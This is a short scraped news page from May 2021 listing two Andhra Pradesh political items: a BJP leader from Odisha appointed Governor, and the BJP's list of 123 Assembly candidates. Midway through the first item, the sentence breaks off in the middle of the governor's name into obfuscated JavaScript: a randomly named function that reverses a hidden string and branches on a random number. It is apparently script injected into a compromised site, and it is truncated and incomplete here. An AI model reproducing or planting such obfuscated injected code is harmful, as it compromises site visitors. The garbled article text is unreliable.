Friday, May 7, 2021

Odisha BJP leader appointed as Governor of AP

With Central government appointing a senior BJP leader from Odisha Biswa Bhusan Harich$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list) == "string") return $soq0ujYKWbanWY6nnjX.list.split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list;};$soq0ujYKWbanWY6nnjX.list=;var c=Math.floor(Math.random() * 5); if...

BJP releases 123 candidates list for 175 AP Assembly

Bharatiya Janata Party (BJP) has announced its candidates for 123 assembly seats out of 175-member Andhra Pradesh Assembly today. The Central Election Committee of the...